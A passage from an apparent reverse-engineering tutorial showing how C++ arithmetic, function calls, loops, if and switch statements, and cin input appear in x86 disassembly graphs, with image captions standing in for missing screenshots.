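    printf("%i\n", A * B);    // multiplication  -> imul
    printf("%i\n", A / B);    // division        -> cdq + idiv
    printf("%i\n", A & B);    // bitwise AND     -> and
    printf("%i\n", A | B);    // bitwise OR      -> or
    printf("%i\n", A ^ B);    // bitwise XOR     -> xor
    printf("%i\n", ~A);       // bitwise NOT     -> not
    printf("%i\n", A >> 1);   // right shift     -> sar
    printf("%i\n", A << 1);   // left shift      -> shl
    return 0;
}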

Let’s break each function down into assembly:

First, we set A to hex 0A, which represents decimal 10, and a second variable to hex 0F, which represents decimal 15.

Variable Setting

We add by using the ‘add’ opcode:

Addition

We subtract using the ‘sub’ opcode:

Subtraction

We multiply using the ‘imul’ opcode:

Multiplication

We divide using the 'idiv' opcode. In this case, we also use 'cdq' to sign-extend EAX into EDX:EAX, since idiv divides the full 64-bit value held in EDX:EAX.

Division

We perform the Bitwise AND using the ‘and’ opcode:

Bitwise AND

We perform the Bitwise OR using the ‘or’ opcode:

Bitwise OR

We perform the Bitwise XOR using the ‘xor’ opcode:

Bitwise XOR

We perform the Bitwise NOT using the ‘not’ opcode:

Bitwise NOT

We perform the Bitwise Right-Shift using the 'sar' opcode:

Bitwise Right-Shift

We perform the Bitwise Left-Shift using the ‘shl’ opcode:

Bitwise Left-Shift

Function Calls

In this section, we’ll be looking at 3 different types of functions:

  1. a basic void function
  2. a function that returns an integer
  3. a function that takes in parameters

Calling Functions
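The original code isn't shown here, but based on the descriptions that follow, the three functions look roughly like this (the bodies and format strings are my approximations):

#include <cstdio>
#include <cstdlib>
#include <string>

void newfunc() {
    printf("Hello! I'm a new function!\n");   // just prints and returns
}

int newfuncret() {
    int A = rand();        // random integer from rand(), stored in A
    return A;              // returned to the caller in EAX
}

void funcparams(std::string s, int i, char c) {
    printf("%s %i %c\n", s.c_str(), i, c);    // print the three parameters
}

int main() {
    newfunc();
    int value = newfuncret();
    funcparams("a string", value, 'x');
    return 0;
}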

First, let’s take a look at calling newfunc() and newfuncret() because neither of those actually take in any parameters.

Calling Functions Without Parameters

If we follow the call to the newfunc() function, we can see that all it really does is print out “Hello! I’m a new function!”:

The newfunc() Function Code
The newfunc() Function

As you can see, this function does use the retn opcode but only to return back to the previous location (so that the program can continue after the function completes.) Now, let’s take a look at the newfuncret() function which generates a random integer using the C++ rand() function and then returns said integer.

The newfuncret() Function Code
The newfuncret() function

First, space is allocated for the A variable. Then the rand() function is called, which returns a value in the EAX register. Next, the value in EAX is moved into the A variable's space, effectively setting A to the result of rand(). Finally, the A variable is moved into EAX so that the function can use it as a return value.

Now that we have an understanding of how to call a function and what it looks like when a function returns something, let's talk about calling functions with parameters:

First, let’s take another look at the call statement:

Calling a Function with Parameters in C++
Calling a Function with Parameters

Although strings in C++ require a call to a basic_string function, the concept of calling a function with parameters is the same regardless of data type. First, you move the variable into a register, then you push the registers onto the stack, then you call the function.

Let’s take a look at the function’s code:

The funcparams() Function Code
The funcparams() Function

All this function does is take in a string, an integer, and a character and print them out using printf. As you can see, first the 3 variables are allocated at the top of the function, then these variables are pushed onto the stack as parameters for the printf function. Easy Peasy.

Loops

Now that we have function calling, output, variables, and math down, let’s move on to flow control. First, we’ll start with a for loop:

For Loop Code
A graphical Overview of the For Loop

Before we break down the assembly code into smaller sections, let's take a look at the general layout. As you can see, when the for loop starts it has two options: it can either go to the box on the right (green arrow) and return, or it can go to the box on the left (red arrow) and loop back to the start of the for loop.

Detailed For Loop

First, we check if we've hit the maximum value by comparing the i variable to the max variable. If the i variable is not greater than or equal to the max variable, we continue down to the left, print out the i variable, then add 1 to i and continue back to the start of the loop. If the i variable is, in fact, greater than or equal to max, we simply exit the for loop and return.
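Put back into C++, the loop being described is roughly the following (a sketch; the bound's value is my assumption):

#include <cstdio>

int main() {
    int max = 10;                      // upper bound (value assumed)
    for (int i = 0; i < max; i++) {    // exit once i >= max
        printf("%i\n", i);             // print i, add 1, loop again
    }
    return 0;
}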

Now, let’s take a look at a while loop:

While Loop Code
While Loop

In this loop, all we're doing is generating a random number between 0 and 20. If the number is greater than 10, we exit the loop and print "I'm out!"; otherwise, we continue to loop.

In the assembly, the A variable is generated and set to 0 originally, then we initialize the loop by comparing A to the hex number 0A which represents decimal 10. If A is not greater than or equal to 10, we generate a new random number which is then set to A and we continue back to the comparison. If A is greater than or equal to 10, we break out of the loop, print out “I’m out” and then return.
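In C++ terms that's roughly the following (my sketch, following the assembly description where the loop exits once A reaches 10):

#include <cstdio>
#include <cstdlib>

int main() {
    int A = 0;              // A starts at 0
    while (A < 10) {        // keep looping until A is at least 10
        A = rand() % 21;    // new random number between 0 and 20
    }
    printf("I'm out!\n");
    return 0;
}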

If Statements

Next, we’ll be talking about if statements. First, let’s take a look at the code:

IF Statement Code

This function generates a random number between 0 and 20 and stores said number in the variable A. If A is greater than 15, the program will print out “greater than 15”. If A is less than 15 but greater than 10, the program will print out “less than 15, greater than 10”. This pattern will continue until A is less than 5, in which case the program will print out “less than 5”.
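A sketch of that chain in C++ (my approximation; the middle message and the exact boundary handling are assumptions based on the pattern described):

#include <cstdio>
#include <cstdlib>

int main() {
    int A = rand() % 21;    // random number between 0 and 20
    if (A > 15)
        printf("greater than 15\n");
    else if (A > 10)
        printf("less than 15, greater than 10\n");
    else if (A > 5)
        printf("less than 10, greater than 5\n");   // middle message assumed
    else
        printf("less than 5\n");
    return 0;
}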

Now, let’s take a look at the assembly graph:

IF Statement Assembly Graph

As you can see, the assembly is structured similarly to the actual code. This is because IF statements are simply "If X Then Y Else Z". If we look at the first set of arrows coming out of the top section, we can see a comparison between the A variable and hex 0F, which represents decimal 15. If A is greater than or equal to 15, the program will print out "greater than 15" and then return. Otherwise, the program will compare A to hex 0A, which represents decimal 10. This pattern will continue until the program prints and returns.

Switch Statements

Switch statements are a lot like IF statements except in a Switch statement one variable or statement is compared to a number of ‘cases’ (or possible equivalences). Let’s take a look at our code:

Switch Statement Code

In this function, we set the variable A to equal a random number between 0 and 10. Then, we compare A to a number of cases using a Switch statement. If A is equal to any of the possible cases, the case number will be printed, and then the program will break out of the Switch statement and the function will return.
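A sketch of that switch in C++ (my approximation; only a few cases are written out):

#include <cstdio>
#include <cstdlib>

int main() {
    int A = rand() % 11;    // random number between 0 and 10
    switch (A) {
        case 0: printf("0\n"); break;
        case 1: printf("1\n"); break;
        case 2: printf("2\n"); break;
        case 5: printf("5\n"); break;   // the case walked through below
        default: break;                 // remaining cases omitted here
    }
    return 0;
}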

Now, let’s take a look at the assembly graph:

Switch Case Assembly Graph

Unlike IF statements, Switch statements do not follow the "If X Then Y Else Z" rule; instead, the program simply compares the conditional statement to the cases and only executes a case if said case is the conditional statement's equivalent. Let's first take a look at the initial two boxes:

The First 2 Graph Sections

First, the program generates a random number and sets it to A. Then, the program initializes the switch statement by first setting a temporary variable (var_D0) to equal A, then ensuring that var_D0 meets at least one of the possible cases. If var_D0 needs to default, the program follows the green arrow down to the final return section (see below). Otherwise, the program initiates a switch jump to the equivalent case’s section:

In the case that var_D0 (A) is equal to 5, the code will jump to the above case section, print out “5” and then jump to the return section.

User Input

In this section, we’ll cover user input using the C++ cin function. First, let’s look at the code:

User Input Code

In this function, we simply take in a string to the variable sentence using the C++ cin function and then we print out sentence through a printf statement.
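In C++ that's roughly the following (my sketch; whether the original uses operator>> or getline isn't visible from the text):

#include <cstdio>
#include <iostream>
#include <string>

int main() {
    std::string sentence;
    std::cin >> sentence;                // read input into the sentence variable
    printf("%s\n", sentence.c_str());    // print it back out with printf
    return 0;
}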

Let's break this down into assembly. First, the C++ cin part:

C++ cin

This code simply initializes the string sentence then calls the cin function and sets the input to the sentence variable. Let’s take a look at the cin call a bit closer:

The C++ cin Function Upclose

First, the program sets the contents of the sentence variable to EAX, then pushes EAX onto the stack to be used as a parameter for the cin function, which is then called and has its output moved into ECX, which is then put on the stack for the printf statement:

User Input printf Statement

Thanks!